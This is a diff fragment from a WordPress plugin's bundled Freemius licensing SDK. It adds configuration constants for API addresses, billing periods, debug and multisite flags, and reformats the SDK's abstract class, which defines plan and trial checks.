+                                   ( isset( $_SERVER['HTTPS'] ) && 'on' == $_SERVER['HTTPS'] ) ||
+                                   ( isset( $_SERVER['SERVER_PORT'] ) && 443 == $_SERVER['SERVER_PORT'] )
+        );
+    }
+
+    if ( ! defined( 'WP_FS__IS_POST_REQUEST' ) ) {
+        define( 'WP_FS__IS_POST_REQUEST', ( WP_FS__IS_HTTP_REQUEST &&
+                                            strtoupper( $_SERVER['REQUEST_METHOD'] ) == 'POST' ) );
+    }
+
+    if ( ! defined( 'WP_FS__REMOTE_ADDR' ) ) {
+        define( 'WP_FS__REMOTE_ADDR', fs_get_ip() );
+    }
+
+    if ( ! defined( 'WP_FS__IS_LOCALHOST' ) ) {
+        if ( defined( 'WP_FS__LOCALHOST_IP' ) ) {
+            define( 'WP_FS__IS_LOCALHOST', ( WP_FS__LOCALHOST_IP === WP_FS__REMOTE_ADDR ) );
+        } else {
+            define( 'WP_FS__IS_LOCALHOST', WP_FS__IS_HTTP_REQUEST &&
+                                           is_string( WP_FS__REMOTE_ADDR ) &&
+                                           ( substr( WP_FS__REMOTE_ADDR, 0, 4 ) === '127.' ||
+                                             WP_FS__REMOTE_ADDR === '::1' )
+            );
+        }
+    }
+
+    if ( ! defined( 'WP_FS__IS_LOCALHOST_FOR_SERVER' ) ) {
+        define( 'WP_FS__IS_LOCALHOST_FOR_SERVER', ( ! WP_FS__IS_HTTP_REQUEST ||
+                                                    false !== strpos( $_SERVER['HTTP_HOST'], 'localhost' ) ) );
+    }
+
+    #endregion
+
+    if ( ! defined( 'WP_FS__IS_PRODUCTION_MODE' ) ) {
+        // By default, run with Freemius production servers.
+        define( 'WP_FS__IS_PRODUCTION_MODE', true );
+    }
+
+    if ( ! defined( 'WP_FS__ADDRESS' ) ) {
+        define( 'WP_FS__ADDRESS', ( WP_FS__IS_PRODUCTION_MODE ? WP_FS__ADDRESS_PRODUCTION : WP_FS__ADDRESS_LOCALHOST ) );
+    }
+
+
+    #--------------------------------------------------------------------------------
+    #region API
+    #--------------------------------------------------------------------------------
+
+    if ( ! defined( 'WP_FS__API_ADDRESS_LOCALHOST' ) ) {
+        define( 'WP_FS__API_ADDRESS_LOCALHOST', 'http://api.freemius-local.com:8080' );
+    }
+    if ( ! defined( 'WP_FS__API_SANDBOX_ADDRESS_LOCALHOST' ) ) {
+        define( 'WP_FS__API_SANDBOX_ADDRESS_LOCALHOST', 'http://sandbox-api.freemius:8080' );
+    }
+
+    // Set API address for local testing.
+    if ( ! WP_FS__IS_PRODUCTION_MODE ) {
+        if ( ! defined( 'FS_API__ADDRESS' ) ) {
+            define( 'FS_API__ADDRESS', WP_FS__API_ADDRESS_LOCALHOST );
+        }
+        if ( ! defined( 'FS_API__SANDBOX_ADDRESS' ) ) {
+            define( 'FS_API__SANDBOX_ADDRESS', WP_FS__API_SANDBOX_ADDRESS_LOCALHOST );
+        }
+    }
+
+    #endregion
+
+    #--------------------------------------------------------------------------------
+    #region Checkout
+    #--------------------------------------------------------------------------------
+
+    if ( ! defined( 'FS_CHECKOUT__ADDRESS_PRODUCTION' ) ) {
+        define( 'FS_CHECKOUT__ADDRESS_PRODUCTION', 'https://checkout.freemius.com' );
+    }
+
+    if ( ! defined( 'FS_CHECKOUT__ADDRESS_LOCALHOST' ) ) {
+        define( 'FS_CHECKOUT__ADDRESS_LOCALHOST', 'http://checkout.freemius-local.com:8080' );
+    }
+
+    if ( ! defined( 'FS_CHECKOUT__ADDRESS' ) ) {
+        define( 'FS_CHECKOUT__ADDRESS', ( WP_FS__IS_PRODUCTION_MODE ? FS_CHECKOUT__ADDRESS_PRODUCTION : FS_CHECKOUT__ADDRESS_LOCALHOST ) );
+    }
+
+    #endregion
+
+    define( 'WP_FS___OPTION_PREFIX', 'fs' . ( WP_FS__IS_PRODUCTION_MODE ? '' : '_dbg' ) . '_' );
+
+    if ( ! defined( 'WP_FS__ACCOUNTS_OPTION_NAME' ) ) {
+        define( 'WP_FS__ACCOUNTS_OPTION_NAME', WP_FS___OPTION_PREFIX . 'accounts' );
+    }
+    if ( ! defined( 'WP_FS__API_CACHE_OPTION_NAME' ) ) {
+        define( 'WP_FS__API_CACHE_OPTION_NAME', WP_FS___OPTION_PREFIX . 'api_cache' );
+    }
+    if ( ! defined( 'WP_FS__GDPR_OPTION_NAME' ) ) {
+        define( 'WP_FS__GDPR_OPTION_NAME', WP_FS___OPTION_PREFIX . 'gdpr' );
+    }
+    define( 'WP_FS__OPTIONS_OPTION_NAME', WP_FS___OPTION_PREFIX . 'options' );
+
+    /**
+     * Module types
+     *
+     * @since 1.2.2
+     */
+    define( 'WP_FS__MODULE_TYPE_PLUGIN', 'plugin' );
+    define( 'WP_FS__MODULE_TYPE_THEME', 'theme' );
+
+    /**
+     * Billing Frequencies
+     */
+    define( 'WP_FS__PERIOD_ANNUALLY', 'annual' );
+    define( 'WP_FS__PERIOD_MONTHLY', 'monthly' );
+    define( 'WP_FS__PERIOD_LIFETIME', 'lifetime' );
+
+    /**
+     * Plans
+     */
+    define( 'WP_FS__PLAN_DEFAULT_PAID', false );
+    define( 'WP_FS__PLAN_FREE', 'free' );
+    define( 'WP_FS__PLAN_TRIAL', 'trial' );
+
+    /**
+     * Times in seconds
+     */
+    if ( ! defined( 'WP_FS__TIME_5_MIN_IN_SEC' ) ) {
+        define( 'WP_FS__TIME_5_MIN_IN_SEC', 300 );
+    }
+    if ( ! defined( 'WP_FS__TIME_10_MIN_IN_SEC' ) ) {
+        define( 'WP_FS__TIME_10_MIN_IN_SEC', 600 );
+    }
+//	define( 'WP_FS__TIME_15_MIN_IN_SEC', 900 );
+    if ( ! defined( 'WP_FS__TIME_12_HOURS_IN_SEC' ) ) {
+        define( 'WP_FS__TIME_12_HOURS_IN_SEC', 43200 );
+    }
+    if ( ! defined( 'WP_FS__TIME_24_HOURS_IN_SEC' ) ) {
+        define( 'WP_FS__TIME_24_HOURS_IN_SEC', WP_FS__TIME_12_HOURS_IN_SEC * 2 );
+    }
+    if ( ! defined( 'WP_FS__TIME_WEEK_IN_SEC' ) ) {
+        define( 'WP_FS__TIME_WEEK_IN_SEC', 7 * WP_FS__TIME_24_HOURS_IN_SEC );
+    }
+
+    #--------------------------------------------------------------------------------
+    #region Debugging
+    #--------------------------------------------------------------------------------
+
+    if ( ! defined( 'WP_FS__DEBUG_SDK' ) ) {
+        $debug_mode = get_option( 'fs_debug_mode', null );
+
+        if ( $debug_mode === null ) {
+            $debug_mode = false;
+            add_option( 'fs_debug_mode', $debug_mode );
+        }
+
+        define( 'WP_FS__DEBUG_SDK', is_numeric( $debug_mode ) ? ( 0 < $debug_mode ) : WP_FS__DEV_MODE );
+    }
+
+    if ( ! defined( 'WP_FS__ECHO_DEBUG_SDK' ) ) {
+        define( 'WP_FS__ECHO_DEBUG_SDK', WP_FS__DEV_MODE && ! empty( $_GET['fs_dbg_echo'] ) );
+    }
+    if ( ! defined( 'WP_FS__LOG_DATETIME_FORMAT' ) ) {
+        define( 'WP_FS__LOG_DATETIME_FORMAT', 'Y-m-d H:i:s' );
+    }
+    if ( ! defined( 'FS_API__LOGGER_ON' ) ) {
+        define( 'FS_API__LOGGER_ON', WP_FS__DEBUG_SDK );
+    }
+
+    if ( WP_FS__ECHO_DEBUG_SDK ) {
+        error_reporting( E_ALL );
+    }
+
+    #endregion
+
+    if ( ! defined( 'WP_FS__SCRIPT_START_TIME' ) ) {
+        define( 'WP_FS__SCRIPT_START_TIME', time() );
+    }
+    if ( ! defined( 'WP_FS__DEFAULT_PRIORITY' ) ) {
+        define( 'WP_FS__DEFAULT_PRIORITY', 10 );
+    }
+    if ( ! defined( 'WP_FS__LOWEST_PRIORITY' ) ) {
+        define( 'WP_FS__LOWEST_PRIORITY', 999999999 );
+    }
+
+    #--------------------------------------------------------------------------------
+    #region Multisite Network
+    #--------------------------------------------------------------------------------
+
+    /**
+     * Do not use this define directly, it will have the wrong value
+     * during plugin uninstall/deletion when the inclusion of the plugin
+     * is triggered due to registration with register_uninstall_hook().
+     *
+     * Instead, use fs_is_network_admin().
+     *
+     * @author Vova Feldman (@svovaf)
+     */
+    if ( ! defined( 'WP_FS__IS_NETWORK_ADMIN' ) ) {
+        define( 'WP_FS__IS_NETWORK_ADMIN',
+            is_multisite() &&
+            ( is_network_admin() ||
+              ( ( defined( 'DOING_AJAX' ) && DOING_AJAX &&
+                  ( isset( $_REQUEST['_fs_network_admin'] ) && 'true' === $_REQUEST['_fs_network_admin'] /*||
+                    ( ! empty( $_REQUEST['action'] ) && 'delete-plugin' === $_REQUEST['action'] )*/ )
+                ) ||
+                // Plugin uninstall.
+                defined( 'WP_UNINSTALL_PLUGIN' ) )
+            )
+        );
+    }
+
+    /**
+     * Do not use this define directly, it will have the wrong value
+     * during plugin uninstall/deletion when the inclusion of the plugin
+     * is triggered due to registration with register_uninstall_hook().
+     *
+     * Instead, use fs_is_blog_admin().
+     *
+     * @author Vova Feldman (@svovaf)
+     */
+    if ( ! defined( 'WP_FS__IS_BLOG_ADMIN' ) ) {
+        define( 'WP_FS__IS_BLOG_ADMIN', is_blog_admin() || ( defined( 'DOING_AJAX' ) && DOING_AJAX && isset( $_REQUEST['_fs_blog_admin'] ) ) );
+    }
+
+    if ( ! defined( 'WP_FS__SHOW_NETWORK_EVEN_WHEN_DELEGATED' ) ) {
+        // Set to true to show network level settings even if delegated to site admins.
+        define( 'WP_FS__SHOW_NETWORK_EVEN_WHEN_DELEGATED', false );
+    }
+
+    #endregion
+
+    if ( ! defined( 'WP_FS__DEMO_MODE' ) ) {
+        define( 'WP_FS__DEMO_MODE', false );
+    }
+    if ( ! defined( 'FS_SDK__SSLVERIFY' ) ) {
+        define( 'FS_SDK__SSLVERIFY', false );
+    }
--- a/new-user-approve/freemius/includes/class-freemius-abstract.php
+++ b/new-user-approve/freemius/includes/class-freemius-abstract.php
@@ -1,538 +1,538 @@
-<?php
-	/**
-	 * @package     Freemius
-	 * @copyright   Copyright (c) 2015, Freemius, Inc.
-	 * @license     https://www.gnu.org/licenses/gpl-3.0.html GNU General Public License Version 3
-	 * @since       1.0.7
-	 */
-
-	if ( ! defined( 'ABSPATH' ) ) {
-		exit;
-	}
-
-
-	/**
-	 * - Each instance of Freemius class represents a single plugin
-	 * install by a single user (the installer of the plugin).
-	 *
-	 * - Each website can only have one install of the same plugin.
-	 *
-	 * - Install entity is only created after a user connects his account with Freemius.
-	 *
-	 * Class Freemius_Abstract
-	 */
-	abstract class Freemius_Abstract {
-
-		#----------------------------------------------------------------------------------
-		#region Identity
-		#----------------------------------------------------------------------------------
-
-		/**
-		 * Check if user has connected his account (opted-in).
-		 *
-		 * Note:
-		 *      If the user opted-in and opted-out on a later stage,
-		 *      this will still return true. If you want to check if the
-		 *      user is currently opted-in, use:
-		 *          `$fs->is_registered() && $fs->is_tracking_allowed()`
-		 *
-		 * @since 1.0.1
-         *
-         * @param bool $ignore_anonymous_state Since 2.5.1
-         *
-		 * @return bool
-		 */
-		abstract function is_registered( $ignore_anonymous_state = false );
-
-		/**
-		 * Check if the user skipped connecting the account with Freemius.
-		 *
-		 * @since 1.0.7
-		 *
-		 * @return bool
-		 */
-		abstract function is_anonymous();
-
-		/**
-		 * Check if the user currently in activation mode.
-		 *
-		 * @since 1.0.7
-		 *
-		 * @return bool
-		 */
-		abstract function is_activation_mode();
-
-		#endregion
-
-		#----------------------------------------------------------------------------------
-		#region Module Type
-		#----------------------------------------------------------------------------------
-
-		/**
-		 * Checks if the plugin's type is "plugin". The other type is "theme".
-		 *
-		 * @author Leo Fajardo (@leorw)
-		 * @since  1.2.2
-		 *
-		 * @return bool
-		 */
-		abstract function is_plugin();
-
-		/**
-		 * Checks if the module type is "theme". The other type is "plugin".
-		 *
-		 * @author Leo Fajardo (@leorw)
-		 * @since  1.2.2
-		 *
-		 * @return bool
-		 */
-		function is_theme() {
-			return ( ! $this->is_plugin() );
-		}
-
-		#endregion
-
-		#----------------------------------------------------------------------------------
-		#region Permissions
-		#----------------------------------------------------------------------------------
-
-		/**
-		 * Check if plugin must be WordPress.org compliant.
-		 *
-		 * @since 1.0.7
-		 *
-		 * @return bool
-		 */
-		abstract function is_org_repo_compliant();
-
-		/**
-		 * Check if plugin is allowed to install executable files.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.0.5
-		 *
-		 * @return bool
-		 */
-		function is_allowed_to_install() {
-			return ( $this->is_premium() || ! $this->is_org_repo_compliant() );
-		}
-
-		#endregion
-
-		/**
-		 * Check if user in trial or in free plan (not paying).
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.0.4
-		 *
-		 * @return bool
-		 */
-		function is_not_paying() {
-			return ( $this->is_trial() || $this->is_free_plan() );
-		}
-
-		/**
-		 * Check if the user has an activated and valid paid license on current plugin's install.
-		 *
-		 * @since 1.0.9
-		 *
-		 * @return bool
-		 */
-		abstract function is_paying();
-
-		/**
-		 * Check if the user is paying or in trial.
-		 *
-		 * @since 1.0.9
-		 *
-		 * @return bool
-		 */
-		function is_paying_or_trial() {
-			return ( $this->is_paying() || $this->is_trial() );
-		}
-
-		/**
-		 * Check if user in a trial or have feature enabled license.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.1.7
-		 *
-		 * @return bool
-		 */
-		abstract function can_use_premium_code();
-
-		#----------------------------------------------------------------------------------
-		#region Premium Only
-		#----------------------------------------------------------------------------------
-
-		/**
-		 * All logic wrapped in methods with "__premium_only()" suffix will be only
-		 * included in the premium code.
-		 *
-		 * Example:
-		 *      if ( freemius()->is__premium_only() ) {
-		 *          ...
-		 *      }
-		 */
-
-		/**
-		 * Returns true when running premium plugin code.
-		 *
-		 * @since 1.0.9
-		 *
-		 * @return bool
-		 */
-		function is__premium_only() {
-			return $this->is_premium();
-		}
-
-		/**
-		 * Check if the user has an activated and valid paid license on current plugin's install.
-		 *
-		 * @since 1.0.9
-		 *
-		 * @return bool
-		 *
-		 */
-		function is_paying__premium_only() {
-			return ( $this->is__premium_only() && $this->is_paying() );
-		}
-
-		/**
-		 * All code wrapped in this statement will be only included in the premium code.
-		 *
-		 * @since  1.0.9
-		 *
-		 * @param string $plan  Plan name.
-		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
-		 *
-		 * @return bool
-		 */
-		function is_plan__premium_only( $plan, $exact = false ) {
-			return ( $this->is_premium() && $this->is_plan( $plan, $exact ) );
-		}
-
-		/**
-		 * Check if plan matches active license' plan or active trial license' plan.
-		 *
-		 * All code wrapped in this statement will be only included in the premium code.
-		 *
-		 * @since  1.0.9
-		 *
-		 * @param string $plan  Plan name.
-		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
-		 *
-		 * @return bool
-		 */
-		function is_plan_or_trial__premium_only( $plan, $exact = false ) {
-			return ( $this->is_premium() && $this->is_plan_or_trial( $plan, $exact ) );
-		}
-
-		/**
-		 * Check if the user is paying or in trial.
-		 *
-		 * All code wrapped in this statement will be only included in the premium code.
-		 *
-		 * @since 1.0.9
-		 *
-		 * @return bool
-		 */
-		function is_paying_or_trial__premium_only() {
-			return $this->is_premium() && $this->is_paying_or_trial();
-		}
-
-		/**
-		 * Check if the user has an activated and valid paid license on current plugin's install.
-		 *
-		 * @since      1.0.4
-		 *
-		 * @return bool
-		 *
-		 * @deprecated Method name is confusing since it's not clear from the name the code will be removed.
-		 * @using      Alias to is_paying__premium_only()
-		 */
-		function is_paying__fs__() {
-			return $this->is_paying__premium_only();
-		}
-
-		/**
-		 * Check if user in a trial or have feature enabled license.
-		 *
-		 * All code wrapped in this statement will be only included in the premium code.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.1.9
-		 *
-		 * @return bool
-		 */
-		function can_use_premium_code__premium_only() {
-			return $this->is_premium() && $this->can_use_premium_code();
-		}
-
-		#endregion
-
-		#----------------------------------------------------------------------------------
-		#region Trial
-		#----------------------------------------------------------------------------------
-
-		/**
-		 * Check if the user in a trial.
-		 *
-		 * @since 1.0.3
-		 *
-		 * @return bool
-		 */
-		abstract function is_trial();
-
-		/**
-		 * Check if trial already utilized.
-		 *
-		 * @since 1.0.9
-		 *
-		 * @return bool
-		 */
-		abstract function is_trial_utilized();
-
-		#endregion
-
-		#----------------------------------------------------------------------------------
-		#region Plans
-		#----------------------------------------------------------------------------------
-
-		/**
-		 * Check if the user is on the free plan of the product.
-		 *
-		 * @since 1.0.4
-		 *
-		 * @return bool
-		 */
-		abstract function is_free_plan();
-
-		/**
-		 * @since  1.0.2
-		 *
-		 * @param string $plan  Plan name.
-		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
-		 *
-		 * @return bool
-		 */
-		abstract function is_plan( $plan, $exact = false );
-
-		/**
-		 * Check if plan based on trial. If not in trial mode, should return false.
-		 *
-		 * @since  1.0.9
-		 *
-		 * @param string $plan  Plan name.
-		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
-		 *
-		 * @return bool
-		 */
-		abstract function is_trial_plan( $plan, $exact = false );
-
-		/**
-		 * Check if plan matches active license' plan or active trial license' plan.
-		 *
-		 * @since  1.0.9
-		 *
-		 * @param string $plan  Plan name.
-		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
-		 *
-		 * @return bool
-		 */
-		function is_plan_or_trial( $plan, $exact = false ) {
-			return $this->is_plan( $plan, $exact ) ||
-			       $this->is_trial_plan( $plan, $exact );
-		}
-
-		/**
-		 * Check if plugin has any paid plans.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.0.7
-		 *
-		 * @return bool
-		 */
-		abstract function has_paid_plan();
-
-		/**
-		 * Check if plugin has any free plan, or is it premium only.
-		 *
-		 * Note: If no plans configured, assume plugin is free.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.0.7
-		 *
-		 * @return bool
-		 */
-		abstract function has_free_plan();
-
-		/**
-		 * Check if plugin is premium only (no free plans).
-		 *
-		 * NOTE: is__premium_only() is very different method, don't get confused.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.1.9
-		 *
-		 * @return bool
-		 */
-		abstract function is_only_premium();
-
-		/**
-		 * Check if module has a premium code version.
-		 *
-		 * Serviceware module might be freemium without any
-		 * premium code version, where the paid features
-		 * are all part of the service.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.2.1.6
-		 *
-		 * @return bool
-		 */
-		abstract function has_premium_version();
-
-		/**
-		 * Check if module has any release on Freemius,
-		 * or all plugin's code is on WordPress.org (Serviceware).
-		 *
-		 * @return bool
-		 */
-		function has_release_on_freemius() {
-			return ! $this->is_org_repo_compliant() ||
-			       $this->has_premium_version();
-		}
-
-		/**
-		 * Checks if it's a freemium plugin.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.1.9
-		 *
-		 * @return bool
-		 */
-		function is_freemium() {
-			return $this->has_paid_plan() &&
-			       $this->has_free_plan();
-		}
-
-		/**
-		 * Check if module has only one plan.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.2.1.7
-		 *
-		 * @return bool
-		 */
-		abstract function is_single_plan();
-
-		#endregion
-
-		/**
-		 * Check if running payments in sandbox mode.
-		 *
-		 * @since 1.0.4
-		 *
-		 * @return bool
-		 */
-		abstract function is_payments_sandbox();
-
-		/**
-		 * Check if running test vs. live plugin.
-		 *
-		 * @since 1.0.5
-		 *
-		 * @return bool
-		 */
-		abstract function is_live();
-
-		/**
-		 * Check if running premium plugin code.
-		 *
-		 * @since 1.0.5
-		 *
-		 * @return bool
-		 */
-		abstract function is_premium();
-
-		/**
-		 * Get upgrade URL.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.0.2
-		 *
-		 * @param string $period Billing cycle.
-		 *
-		 * @return string
-		 */
-		abstract function get_upgrade_url( $period = WP_FS__PERIOD_ANNUALLY );
-
-		/**
-		 * Check if Freemius was first added in a plugin update.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.1.5
-		 *
-		 * @return bool
-		 */
-		function is_plugin_update() {
-			return ! $this->is_plugin_new_install();
-		}
-
-		/**
-		 * Check if Freemius was part of the plugin when the user installed it first.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.1.5
-		 *
-		 * @return bool
-		 */
-		abstract function is_plugin_new_install();
-
-		#----------------------------------------------------------------------------------
-		#region Marketing
-		#----------------------------------------------------------------------------------
-
-		/**
-		 * Check if current user purchased any other plugins before.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.0.9
-		 *
-		 * @return bool
-		 */
-		abstract function has_purchased_before();
-
-		/**
-		 * Check if current user classified as an agency.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.0.9
-		 *
-		 * @return bool
-		 */
-		abstract function is_agency();
-
-		/**
-		 * Check if current user classified as a developer.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.0.9
-		 *
-		 * @return bool
-		 */
-		abstract function is_developer();
-
-		/**
-		 * Check if current user classified as a business.
-		 *
-		 * @author Vova Feldman (@svovaf)
-		 * @since  1.0.9
-		 *
-		 * @return bool
-		 */
-		abstract function is_business();
-
-		#endregion
+<?php
+	/**
+	 * @package     Freemius
+	 * @copyright   Copyright (c) 2015, Freemius, Inc.
+	 * @license     https://www.gnu.org/licenses/gpl-3.0.html GNU General Public License Version 3
+	 * @since       1.0.7
+	 */
+
+	if ( ! defined( 'ABSPATH' ) ) {
+		exit;
+	}
+
+
+	/**
+	 * - Each instance of Freemius class represents a single plugin
+	 * install by a single user (the installer of the plugin).
+	 *
+	 * - Each website can only have one install of the same plugin.
+	 *
+	 * - Install entity is only created after a user connects his account with Freemius.
+	 *
+	 * Class Freemius_Abstract
+	 */
+	abstract class Freemius_Abstract {
+
+		#----------------------------------------------------------------------------------
+		#region Identity
+		#----------------------------------------------------------------------------------
+
+		/**
+		 * Check if user has connected his account (opted-in).
+		 *
+		 * Note:
+		 *      If the user opted-in and opted-out on a later stage,
+		 *      this will still return true. If you want to check if the
+		 *      user is currently opted-in, use:
+		 *          `$fs->is_registered() && $fs->is_tracking_allowed()`
+		 *
+		 * @since 1.0.1
+         *
+         * @param bool $ignore_anonymous_state Since 2.5.1
+         *
+		 * @return bool
+		 */
+		abstract function is_registered( $ignore_anonymous_state = false );
+
+		/**
+		 * Check if the user skipped connecting the account with Freemius.
+		 *
+		 * @since 1.0.7
+		 *
+		 * @return bool
+		 */
+		abstract function is_anonymous();
+
+		/**
+		 * Check if the user currently in activation mode.
+		 *
+		 * @since 1.0.7
+		 *
+		 * @return bool
+		 */
+		abstract function is_activation_mode();
+
+		#endregion
+
+		#----------------------------------------------------------------------------------
+		#region Module Type
+		#----------------------------------------------------------------------------------
+
+		/**
+		 * Checks if the plugin's type is "plugin". The other type is "theme".
+		 *
+		 * @author Leo Fajardo (@leorw)
+		 * @since  1.2.2
+		 *
+		 * @return bool
+		 */
+		abstract function is_plugin();
+
+		/**
+		 * Checks if the module type is "theme". The other type is "plugin".
+		 *
+		 * @author Leo Fajardo (@leorw)
+		 * @since  1.2.2
+		 *
+		 * @return bool
+		 */
+		function is_theme() {
+			return ( ! $this->is_plugin() );
+		}
+
+		#endregion
+
+		#----------------------------------------------------------------------------------
+		#region Permissions
+		#----------------------------------------------------------------------------------
+
+		/**
+		 * Check if plugin must be WordPress.org compliant.
+		 *
+		 * @since 1.0.7
+		 *
+		 * @return bool
+		 */
+		abstract function is_org_repo_compliant();
+
+		/**
+		 * Check if plugin is allowed to install executable files.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.0.5
+		 *
+		 * @return bool
+		 */
+		function is_allowed_to_install() {
+			return ( $this->is_premium() || ! $this->is_org_repo_compliant() );
+		}
+
+		#endregion
+
+		/**
+		 * Check if user in trial or in free plan (not paying).
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.0.4
+		 *
+		 * @return bool
+		 */
+		function is_not_paying() {
+			return ( $this->is_trial() || $this->is_free_plan() );
+		}
+
+		/**
+		 * Check if the user has an activated and valid paid license on current plugin's install.
+		 *
+		 * @since 1.0.9
+		 *
+		 * @return bool
+		 */
+		abstract function is_paying();
+
+		/**
+		 * Check if the user is paying or in trial.
+		 *
+		 * @since 1.0.9
+		 *
+		 * @return bool
+		 */
+		function is_paying_or_trial() {
+			return ( $this->is_paying() || $this->is_trial() );
+		}
+
+		/**
+		 * Check if user in a trial or have feature enabled license.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.1.7
+		 *
+		 * @return bool
+		 */
+		abstract function can_use_premium_code();
+
+		#----------------------------------------------------------------------------------
+		#region Premium Only
+		#----------------------------------------------------------------------------------
+
+		/**
+		 * All logic wrapped in methods with "__premium_only()" suffix will be only
+		 * included in the premium code.
+		 *
+		 * Example:
+		 *      if ( freemius()->is__premium_only() ) {
+		 *          ...
+		 *      }
+		 */
+
+		/**
+		 * Returns true when running premium plugin code.
+		 *
+		 * @since 1.0.9
+		 *
+		 * @return bool
+		 */
+		function is__premium_only() {
+			return $this->is_premium();
+		}
+
+		/**
+		 * Check if the user has an activated and valid paid license on current plugin's install.
+		 *
+		 * @since 1.0.9
+		 *
+		 * @return bool
+		 *
+		 */
+		function is_paying__premium_only() {
+			return ( $this->is__premium_only() && $this->is_paying() );
+		}
+
+		/**
+		 * All code wrapped in this statement will be only included in the premium code.
+		 *
+		 * @since  1.0.9
+		 *
+		 * @param string $plan  Plan name.
+		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
+		 *
+		 * @return bool
+		 */
+		function is_plan__premium_only( $plan, $exact = false ) {
+			return ( $this->is_premium() && $this->is_plan( $plan, $exact ) );
+		}
+
+		/**
+		 * Check if plan matches active license' plan or active trial license' plan.
+		 *
+		 * All code wrapped in this statement will be only included in the premium code.
+		 *
+		 * @since  1.0.9
+		 *
+		 * @param string $plan  Plan name.
+		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
+		 *
+		 * @return bool
+		 */
+		function is_plan_or_trial__premium_only( $plan, $exact = false ) {
+			return ( $this->is_premium() && $this->is_plan_or_trial( $plan, $exact ) );
+		}
+
+		/**
+		 * Check if the user is paying or in trial.
+		 *
+		 * All code wrapped in this statement will be only included in the premium code.
+		 *
+		 * @since 1.0.9
+		 *
+		 * @return bool
+		 */
+		function is_paying_or_trial__premium_only() {
+			return $this->is_premium() && $this->is_paying_or_trial();
+		}
+
+		/**
+		 * Check if the user has an activated and valid paid license on current plugin's install.
+		 *
+		 * @since      1.0.4
+		 *
+		 * @return bool
+		 *
+		 * @deprecated Method name is confusing since it's not clear from the name the code will be removed.
+		 * @using      Alias to is_paying__premium_only()
+		 */
+		function is_paying__fs__() {
+			return $this->is_paying__premium_only();
+		}
+
+		/**
+		 * Check if user in a trial or have feature enabled license.
+		 *
+		 * All code wrapped in this statement will be only included in the premium code.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.1.9
+		 *
+		 * @return bool
+		 */
+		function can_use_premium_code__premium_only() {
+			return $this->is_premium() && $this->can_use_premium_code();
+		}
+
+		#endregion
+
+		#----------------------------------------------------------------------------------
+		#region Trial
+		#----------------------------------------------------------------------------------
+
+		/**
+		 * Check if the user in a trial.
+		 *
+		 * @since 1.0.3
+		 *
+		 * @return bool
+		 */
+		abstract function is_trial();
+
+		/**
+		 * Check if trial already utilized.
+		 *
+		 * @since 1.0.9
+		 *
+		 * @return bool
+		 */
+		abstract function is_trial_utilized();
+
+		#endregion
+
+		#----------------------------------------------------------------------------------
+		#region Plans
+		#----------------------------------------------------------------------------------
+
+		/**
+		 * Check if the user is on the free plan of the product.
+		 *
+		 * @since 1.0.4
+		 *
+		 * @return bool
+		 */
+		abstract function is_free_plan();
+
+		/**
+		 * @since  1.0.2
+		 *
+		 * @param string $plan  Plan name.
+		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
+		 *
+		 * @return bool
+		 */
+		abstract function is_plan( $plan, $exact = false );
+
+		/**
+		 * Check if plan based on trial. If not in trial mode, should return false.
+		 *
+		 * @since  1.0.9
+		 *
+		 * @param string $plan  Plan name.
+		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
+		 *
+		 * @return bool
+		 */
+		abstract function is_trial_plan( $plan, $exact = false );
+
+		/**
+		 * Check if plan matches active license' plan or active trial license' plan.
+		 *
+		 * @since  1.0.9
+		 *
+		 * @param string $plan  Plan name.
+		 * @param bool   $exact If true, looks for exact plan. If false, also check "higher" plans.
+		 *
+		 * @return bool
+		 */
+		function is_plan_or_trial( $plan, $exact = false ) {
+			return $this->is_plan( $plan, $exact ) ||
+			       $this->is_trial_plan( $plan, $exact );
+		}
+
+		/**
+		 * Check if plugin has any paid plans.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.0.7
+		 *
+		 * @return bool
+		 */
+		abstract function has_paid_plan();
+
+		/**
+		 * Check if plugin has any free plan, or is it premium only.
+		 *
+		 * Note: If no plans configured, assume plugin is free.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.0.7
+		 *
+		 * @return bool
+		 */
+		abstract function has_free_plan();
+
+		/**
+		 * Check if plugin is premium only (no free plans).
+		 *
+		 * NOTE: is__premium_only() is very different method, don't get confused.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.1.9
+		 *
+		 * @return bool
+		 */
+		abstract function is_only_premium();
+
+		/**
+		 * Check if module has a premium code version.
+		 *
+		 * Serviceware module might be freemium without any
+		 * premium code version, where the paid features
+		 * are all part of the service.
+		 *
+		 * @author Vova Feldman (@svovaf)
+		 * @since  1.2.1.6
+		 *
+		 * @return bool
+		 */
+		abstract function has_premium_version();
+
+		/**
